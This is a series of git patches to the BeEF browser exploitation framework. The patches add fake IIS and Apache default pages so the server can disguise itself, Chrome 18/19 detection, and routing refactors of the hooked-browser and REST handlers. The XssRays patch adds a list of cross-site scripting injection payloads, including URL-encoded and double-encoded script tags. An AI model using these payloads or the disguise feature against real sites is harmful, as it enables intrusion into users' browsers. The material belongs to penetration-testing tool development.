diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index f21401d30..e07d01fe1 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -217,7 +217,8 @@ module BeEF
                     "</body>" +
                     "</html>"
               when "iis"
-
+                #todo find the default Under Construction root page, like http://help.axcms.net/upload/iis6_localhost_9593.jpg
+                 ""
               else
                 ""
             end

From 67d024441d39ba7ba138a765954e9115627a4e90 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 4 Apr 2012 16:45:39 +0100
Subject: [PATCH 18/31] Added Apache/Centos images for the default root page
 (web server imitation)

---
 .../admin_ui/media/images/icons/apache_pb.gif    | Bin 0 -> 2326 bytes
 .../media/images/icons/powered_by_rh.png         | Bin 0 -> 1213 bytes
 2 files changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 extensions/admin_ui/media/images/icons/apache_pb.gif
 create mode 100644 extensions/admin_ui/media/images/icons/powered_by_rh.png

diff --git a/extensions/admin_ui/media/images/icons/apache_pb.gif b/extensions/admin_ui/media/images/icons/apache_pb.gif
new file mode 100644
index 0000000000000000000000000000000000000000..3a1c139fc4247ec7e770fdaab961fb3692c953fb
GIT binary patch
literal 2326
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

literal 0
HcmV?d00001

diff --git a/extensions/admin_ui/media/images/icons/powered_by_rh.png b/extensions/admin_ui/media/images/icons/powered_by_rh.png
new file mode 100644
index 0000000000000000000000000000000000000000..0062e600027366e2a34c80902c72cec80eeda62e
GIT binary patch
literal 1213
zcmV;u1Va0XP)<h;3K|Lk000e1NJLTq003A30018d0{{R3R2KTu00003b3#c}2nYz<
z;ZNWI006*HOjJb(2x64U7)?x%0Ga=wx&NuG&AD-@K&Jnv*(^=J?2{yVeUrxj%>T>h
zvEIpq!1>RBv;Tg5uOFrV?wkn#RE*NH(uTwU;Ku)yl)U@YhyYE2(8K>zy8n#?X8>rf
z%;=HP&#i(7WSPt}^u1V`=Gnl%|M%dnCnk4h%;mq|cYxX7Gqdu;!`F@9+|!lDs7jG`
zzx2n9wUX2S6_Da!tpDEcxBxd>Wx@Z+kiN|S%y!8C@2Dl_)YA3Jdk~!e&*b*plX0;C
z000SaNLh0L04^8+04^8-Dyk<S00008bVXQnLvL+uWo~o;_RN;Q0000WbVXQnQ*UN;
zcVTj608L?Ia&K*AWNBd_Mrm?ocW-iQb0AGvyOAm+000A2Nkl<Zc$~GCi*l+k5QedU
z94wwdl!Dq8FA=$Dy%f}F3Ge?_XA=a)UYt2&cNj>>@@4byLXh&!?)m-}ze}6^aDT4$
z{wf_d@-NtHSK93^ZyfFf?)U59gI_0OLP&&fKrrDRME?OCO*+}?ay+IaK<EZIrZJpp
z@Ff^?+xW-h(LacG`Ai@aDhFhNgGi3yAS@selSvQ-EFu7du>#E37DY1nU4SuZx7&Fd
zrrF2Z&Q(=a@CghS1XN!jonk^`U?H6>WQro45FPQcpa3soM8F9JHE?@8_QFQP>+MG`
z>wT-WFTqiaWkUFJ389Ekogjj!Od&4lB2tVMQUsJCgxD20OveDu)}ztVUbb9ZNdeL$
z7Er8H5>o^nEbBs1v|ucTF}(msj38h~avkiYVSD_<!ArYo?`vQNu|m#K4ARPM0Wt_M
zNP_}CCcuPJs1DGg4$i|du*YH6Yyo$<&e@Gp_{Kn)8hF!gG{&jtr4xG(+|i5ue{TvF
z!JomaH%QzQq%ZB+%YAD!dTFYwpAp}HPuv2`R?XJX^8lNs`Fw6S*Xy-CvvxlsZkPZc
z>`|+^2W!6Naqe1=VAf1hxf)txa{J;@&D6?<X=)-ROcTz0ppXJ0wq47z)cHLB@ck^y
zdc&Eu0%yf2><h4Ii0P7(2Xr*!+%7e?ElHAQ?!(;kv)-}O>HHNM16R?weG3MdlW57n
zFcR*a2yc9@ii0Xi531$PL%-Maf$a0IGz0F%(zztKT&p=XrqCZ44p)IWh9h5kpX=BH
zt~#^4?C59yG0SlgP8lnk7LuHnJC%zo<B^^e!Tk0o@S_Xd2g&t%oe7Y8Lo8NXiEA1I
zF^9$<20AXJsHWx(o{%Y6QUlK(fGfbAqdz%bgPjV%qnbkRGngq(v5w>d?9OJcbpk{B
zDsZ`bl-2PWoK)b#6LY!GU<GP7S9$U>KOYW<^OMF&1y)4zuE15oluOl&>mB5f{%MTc
zoAVChRB;Td$m(FFm^-<sh-nR6*eZMqqjOi(z<}q2hoRIX1{U<8&J1S?rvZ}_?#bKA
z7rS)3{#DbI^35}^HD&{GpPBqRNLcA&IHvp=e9!-i=jS`IYPRi5@SD}WyY;tQ={LCD
b?soeRti`eDj?SWo00000NkvXXu0mjf--Jz=

literal 0
HcmV?d00001


From e76f301593d32b18adae6838a3f4f4030be4ad4f Mon Sep 17 00:00:00 2001
From: Thomas Mackenzie <tmac@tmacuk.co.uk>
Date: Wed, 4 Apr 2012 18:39:56 +0100
Subject: [PATCH 19/31] added iis imitation construction page

---
 core/main/router/router.rb | 31 +++++++++++++++++++++++++++++--
 1 file changed, 29 insertions(+), 2 deletions(-)

diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index e07d01fe1..e6ca7151b 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -217,8 +217,35 @@ module BeEF
                     "</body>" +
                     "</html>"
               when "iis"
-                #todo find the default Under Construction root page, like http://help.axcms.net/upload/iis6_localhost_9593.jpg
-                 ""
+                "<html>" +
+                    "<head>" +
+                    "<meta HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=Windows-1252\">" +
+                    "<title ID=titletext>Under Construction</title>" +
+                    "</head>" +
+                    "<body bgcolor=white>" +
+                    "<table>" +
+                    "<tr>" +
+                    "<td ID=tableProps width=70 valign=top align=center>" +
+                    "<img ID=pagerrorImg src=\"/ui/media/images/icons/pagerror.gif\" width=36 height=48>" +
+                    "<td ID=tablePropsWidth width=400>" +
+                    "<h1 ID=errortype style=\"font:14pt/16pt verdana; color:#4e4e4e\">" +
+                    "<P ID=Comment1><!--Problem--><P ID=\"errorText\">Under Construction</h1>" +
+                    "<P ID=Comment2><!--Probable causes:<--><P ID=\"errordesc\"><font style=\"font:9pt/12pt verdana; color:black\">" +
+                    "The site you are trying to view does not currently have a default page. It may be in the process of being upgraded and configured." +
+                    "<P ID=term1>Please try this site again later. If you still experience the problem, try contacting the Web site administrator." +
+                    "<hr size=1 color=\"blue\">" +
+                    "<P ID=message1>If you are the Web site administrator and feel you have received this message in error, please see &quot;Enabling and Disabling Dynamic Content&quot; in IIS Help." +
+                    "<h5 ID=head1>To access IIS Help</h5>" +
+                    "<ol>" +
+                    "<li ID=bullet1>Click <b>Start</b>, and then click <b>Run</b>." +
+                    "<li ID=bullet2>In the <b>Open</b> text box, type <b>inetmgr</b>. IIS Manager appears." +
+                    "<li ID=bullet3>From the <b>Help</b> menu, click <b>Help Topics</b>." +
+                    "<li ID=bullet4>Click <b>Internet Information Services</b>.</ol>" +
+                    "</td>" +
+                    "</tr>" +
+                    "</table>" +
+                    "</body>" +
+                    "</html>"
               else
                 ""
             end

From e168a059367068bf0ec2494009c8db08dfd65e36 Mon Sep 17 00:00:00 2001
From: Thomas Mackenzie <tmac@tmacuk.co.uk>
Date: Wed, 4 Apr 2012 20:04:31 +0100
Subject: [PATCH 20/31] added pageerror logo for iis imitation

---
 .../admin_ui/media/images/icons/pagerror.gif     | Bin 0 -> 2806 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 extensions/admin_ui/media/images/icons/pagerror.gif

diff --git a/extensions/admin_ui/media/images/icons/pagerror.gif b/extensions/admin_ui/media/images/icons/pagerror.gif
new file mode 100644
index 0000000000000000000000000000000000000000..dd936e58eede77655351b01480f848c00ab98806
GIT binary patch
literal 2806
zcmZ?wbhEHbRADe+*!-UX2pYh+0ZcUjc?}?N;J^Wp<bQ_$U<ybBSwNrz6l4JDWnek~
z;e_YvrTVY`^8HsRXGnZDb%ol*hcg$k8*R&fb#hI_Vab0xch5hzosq3udeKV`Bdy*u
z=h`_^!)mWS<~Z=SYP0*zR2Dfoi5E9S4(4rUe9F$`>#m%|QL*aW@z;ShrFDgkCC!?}
zjph24g+=L^-97bz?Ng^Iwzf@9os}^|wX=4PY3l;jWlQu|c1&q#Tt0Kds_M;a`}o&r
z^e)}Dd!6E<(n$*s$joaxI`_o<Q`0w|4?cELX3v##*AHI4S#<m6wL4euU4QV<xghW5
ztJiPx;@*Gw`01k{gEh!+qhK@yMnizS5MbvZ2pHJ;2?35#HF$%F<nZA^1_+~3%t2Pd
zgF_8JKL=D92SNo<5G}r-YLJzTszHPXEDRAMKo&|EBI1HFH7L3f92C0{!YC{>H5}|f
zH?gC{I+~lYCk<48@xwia$1ZBAfdw<Fqw)C*UUs3SXC%jRu)_dOHS9=5C$6#%CeFdm
zzz<_1*#c%l#X(94r~xa%uLhz7uNtTld}?4y@Th?+!L0_N1h*QHr=b96_#l+<!y*NP
Ih8Y5+0au3MzyJUM

literal 0
HcmV?d00001


From f852b87b2bdcd4edaf67534de17ec59b9c92baf6 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 5 Apr 2012 12:45:10 +0930
Subject: [PATCH 21/31] Added detection for Chrome 18 and 19

---
 core/main/client/browser.js | 25 ++++++++++++++++++++++---
 1 file changed, 22 insertions(+), 3 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index f4d83780b..bbc4979d0 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -308,12 +308,28 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
         return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false);
     },
 
+	/**
+	 * Returns true if Chrome 18.
+	 * @example: beef.browser.isC18()
+	 */
+	isC18: function() {
+		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==18)?true:false);
+	},
+
+	/**
+	 * Returns true if Chrome 19.
+	 * @example: beef.browser.isC19()
+	 */
+	isC19: function() {
+		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false);
+	},
+
 	/**
 	 * Returns true if Chrome.
 	 * @example: beef.browser.isC()
 	 */
 	isC: function() {
-		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17();
+		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19();
 	},
 
 	/**
@@ -377,7 +393,9 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
 			C14:	this.isC14(),	// Chrome 14
 			C15:    this.isC15(),   // Chrome 15
 			C16:	this.isC16(),	// Chrome 16
-            C17:	this.isC17(),	// Chrome 16
+            C17:	this.isC17(),	// Chrome 17
+			C18:	this.isC18(),	// Chrome 18
+			C19:	this.isC19(),	// Chrome 19
 			C:	this.isC(), 	// Chrome any version
 
 			FF2:	this.isFF2(),	// Firefox 2
@@ -434,7 +452,8 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
 		if (this.isC15())	{ return '15' }; 	// Chrome 15
 		if (this.isC16())	{ return '16' };	// Chrome 16
         if (this.isC17())	{ return '17' };	// Chrome 17
-
+		if (this.isC18())   { return '18' };    // Chrome 18
+		if (this.isC19())   { return '19' };    // Chrome 19
 
 		if (this.isFF2())	{ return '2'  };	// Firefox 2
 		if (this.isFF3())	{ return '3'  };	// Firefox 3

From cce8cf451cd34202e9bf4da90936577134694100 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 5 Apr 2012 14:26:30 +0930
Subject: [PATCH 22/31] Added XssRays vectors:

	o URL encoded
	o Double URL encoded
	o Double nibble URL encoded

Fixes issue #65

Part of issue #47
---
 core/main/client/net/xssrays.js | 17 ++++++++++++-----
 1 file changed, 12 insertions(+), 5 deletions(-)

diff --git a/core/main/client/net/xssrays.js b/core/main/client/net/xssrays.js
index 93091680f..f680c9ea9 100644
--- a/core/main/client/net/xssrays.js
+++ b/core/main/client/net/xssrays.js
@@ -49,17 +49,24 @@ beef.net.xssrays = {
     //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
     vectors: [
 
-//				  {input:"',XSS,'", name: 'Standard DOM based injection single', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
+//				  {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
+//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
+//				  {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
 //				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
   				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
   				  {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}

From 3d80a952ae388d3288cefc23dabbca140020deab Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Sun, 8 Apr 2012 16:07:22 +1000
Subject: [PATCH 23/31] Version number updated

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index 8280a67a7..aafd485c3 100644
--- a/VERSION
+++ b/VERSION
@@ -14,4 +14,4 @@
 #   limitations under the License.
 #
 
-0.4.3.3-alpha
+0.4.3.4-alpha
diff --git a/config.yaml b/config.yaml
index 08eff1b27..97658800e 100644
--- a/config.yaml
+++ b/config.yaml
@@ -16,7 +16,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.3-alpha'
+    version: '0.4.3.4-alpha'
     debug: false
 
     restrictions:

From c60825faaea3199d77d5d373624f5665e8e48942 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 9 Apr 2012 10:33:23 +0100
Subject: [PATCH 24/31] Issue 654: adjusted DynamicReconstruction handler to
 extend the Router class

---
 .../handlers/dynamicreconstruction.rb         | 64 +++++--------------
 1 file changed, 17 insertions(+), 47 deletions(-)

diff --git a/core/main/network_stack/handlers/dynamicreconstruction.rb b/core/main/network_stack/handlers/dynamicreconstruction.rb
index 6b2afa2e3..059f38ebf 100644
--- a/core/main/network_stack/handlers/dynamicreconstruction.rb
+++ b/core/main/network_stack/handlers/dynamicreconstruction.rb
@@ -19,7 +19,7 @@ module NetworkStack
 module Handlers
   
   # @note DynamicHandler is used reconstruct segmented traffic from the hooked browser
-  class DynamicReconstruction
+  class DynamicReconstruction < BeEF::Core::Router::Router
 
     # @note holds packet queue
     PQ = Array.new() 
@@ -27,50 +27,33 @@ module Handlers
     # @note obtain dynamic mount points from HttpHookServer
     MOUNTS = BeEF::Core::Server.instance.mounts
 
+    before do
+      error 404 unless params != nil
+      headers 'Pragma' => 'no-cache',
+              'Cache-Control' => 'no-cache',
+              'Expires' => '0'
+    end
+
     # Combines packet information and pushes to PQ (packet queue), then checks packets
-    def call(env)
-        @request = Rack::Request.new(env)
-
-        # skip packet checking if the request method is HEAD, PUT, DELETE or if parameters == null
-        if not self.is_valid_req(@request)
-            response = Rack::Response.new(
-                   body = [],
-                   status = 404,
-                   header = {
-                     'Pragma' => 'no-cache',
-                     'Cache-Control' => 'no-cache',
-                     'Expires' => '0'
-                   }
-               )
-            return response
-        end
-
-        response = Rack::Response.new(
-            body = [],
-            status = 200,
-            header = {
-              'Pragma' => 'no-cache',
+    get '/' do
+      headers 'Pragma' => 'no-cache',
               'Cache-Control' => 'no-cache',
               'Expires' => '0',
               'Content-Type' => 'text/javascript',
               'Access-Control-Allow-Origin' => '*',
               'Access-Control-Allow-Methods' => 'POST, GET'
-            }
-        )
 
         PQ << {
-            :beefhook =>  @request['bh'],
-            :stream_id => Integer(@request['sid']),
-            :packet_id => Integer(@request['pid']),
-            :packet_count => Integer(@request['pc']),
-            :data => @request['d']
+            :beefhook =>  params[:bh],
+            :stream_id => Integer(params[:sid]),
+            :packet_id => Integer(params[:pid]),
+            :packet_count => Integer(params[:pc]),
+            :data => params[:d]
         }
 
-        # @todo Test under high load, possibly limit the amount of threads being created
         Thread.new {
            check_packets()
         }
-        response
     end
 
     # Check packets goes through the PQ array and attempts to reconstruct the stream from multiple packets
@@ -99,8 +82,8 @@ module Handlers
                 begin
                     res = JSON.parse(b64).first
                     res['beefhook'] = packet[:beefhook]
-                    res['request'] = @request
-                    res['beefsession'] = @request[BeEF::Core::Configuration.instance.get('beef.http.hook_session_name')]
+                    res['request'] = request
+                    res['beefsession'] = request[BeEF::Core::Configuration.instance.get('beef.http.hook_session_name')]
                     execute(res)
                 rescue JSON::ParserError => e
                     print_debug 'Network stack could not decode packet stream.'
@@ -132,17 +115,6 @@ module Handlers
             end
         end
     end
-
-    # 1. check methods HEAD, PUT, DELETE. return 404 if these methods are called
-    # 2. check for parameters = null (no parameters). return 404 in this case
-    # @param [Hash] request the Rack HTTP Request.
-    def is_valid_req(request)
-      is_valid = true
-      if request.put? or request.delete? or request.head? or request.params.empty?
-         is_valid = false
-      end
-      is_valid
-    end
     
     # Assist function for getting parameter from hash
     # @param [Hash] query Hash to pull key from
@@ -152,9 +124,7 @@ module Handlers
       return nil if query[key].nil?
       query[key]
     end
-    
   end
-  
 end
 end
 end

From 8cac63a2f0284ce05797b23a8cd1e6574a4daee5 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 9 Apr 2012 11:03:02 +0100
Subject: [PATCH 25/31] Issue 654: if /dh handler is called without params,
 return 404

---
 core/main/network_stack/handlers/dynamicreconstruction.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/network_stack/handlers/dynamicreconstruction.rb b/core/main/network_stack/handlers/dynamicreconstruction.rb
index 059f38ebf..1813212ef 100644
--- a/core/main/network_stack/handlers/dynamicreconstruction.rb
+++ b/core/main/network_stack/handlers/dynamicreconstruction.rb
@@ -28,7 +28,7 @@ module Handlers
     MOUNTS = BeEF::Core::Server.instance.mounts
 
     before do
-      error 404 unless params != nil
+      error 404 unless !params.empty?
       headers 'Pragma' => 'no-cache',
               'Cache-Control' => 'no-cache',
               'Expires' => '0'

From 22772c7822f7b9b24cb2017f8f796905d615f6a8 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 9 Apr 2012 11:16:21 +0100
Subject: [PATCH 26/31] Issue 654: the RESTful api classes are now extending
 the Router class

---
 core/main/rest/handlers/hookedbrowsers.rb | 4 +---
 core/main/rest/handlers/logs.rb           | 4 +---
 core/main/rest/handlers/modules.rb        | 4 +---
 3 files changed, 3 insertions(+), 9 deletions(-)

diff --git a/core/main/rest/handlers/hookedbrowsers.rb b/core/main/rest/handlers/hookedbrowsers.rb
index b56fffbe4..aa269ff88 100644
--- a/core/main/rest/handlers/hookedbrowsers.rb
+++ b/core/main/rest/handlers/hookedbrowsers.rb
@@ -17,11 +17,9 @@
 module BeEF
   module Core
     module Rest
-      class HookedBrowsers < Sinatra::Base
+      class HookedBrowsers < BeEF::Core::Router::Router
 
         config = BeEF::Core::Configuration.instance
-        configure do set :show_exceptions, false end
-        not_found do 'Not Found.' end
 
         before do
           error 401 unless params[:token] == config.get('beef.api_token')
diff --git a/core/main/rest/handlers/logs.rb b/core/main/rest/handlers/logs.rb
index d4ee2bc0d..52a64e089 100644
--- a/core/main/rest/handlers/logs.rb
+++ b/core/main/rest/handlers/logs.rb
@@ -17,11 +17,9 @@
 module BeEF
   module Core
     module Rest
-      class Logs < Sinatra::Base
+      class Logs < BeEF::Core::Router::Router
 
         config = BeEF::Core::Configuration.instance
-        configure do set :show_exceptions, false end
-        not_found do 'Not Found.' end
 
         before do
           error 401 unless params[:token] == config.get('beef.api_token')
diff --git a/core/main/rest/handlers/modules.rb b/core/main/rest/handlers/modules.rb
index 0d2707089..5afa85482 100644
--- a/core/main/rest/handlers/modules.rb
+++ b/core/main/rest/handlers/modules.rb
@@ -17,11 +17,9 @@
 module BeEF
   module Core
     module Rest
-      class Modules < Sinatra::Base
+      class Modules < BeEF::Core::Router::Router
 
         config = BeEF::Core::Configuration.instance
-        configure do set :show_exceptions, false end
-        not_found do 'Not Found.' end
 
         before do
           error 401 unless params[:token] == config.get('beef.api_token')

From dd2e522ce432fa977a140cc7599b2232cf928cb9 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 9 Apr 2012 11:36:35 +0100
Subject: [PATCH 27/31] Issue 654: the XssRays handler is now extending the
 Router class

---
 extensions/xssrays/handler.rb | 38 ++++++++++++++---------------------
 1 file changed, 15 insertions(+), 23 deletions(-)

diff --git a/extensions/xssrays/handler.rb b/extensions/xssrays/handler.rb
index 06618e709..14b860bcf 100644
--- a/extensions/xssrays/handler.rb
+++ b/extensions/xssrays/handler.rb
@@ -17,28 +17,26 @@ module BeEF
   module Extension
     module Xssrays
 
-      class Handler
+      class Handler < BeEF::Core::Router::Router
 
         XS = BeEF::Core::Models::Xssraysscan
         XD = BeEF::Core::Models::Xssraysdetail
         HB = BeEF::Core::Models::HookedBrowser
 
-        def call(env)
-           @request = Rack::Request.new(env)
-
+        get '/' do
           # verify if the request contains the hook token
-          # raise an exception if it's null or not found in the DB
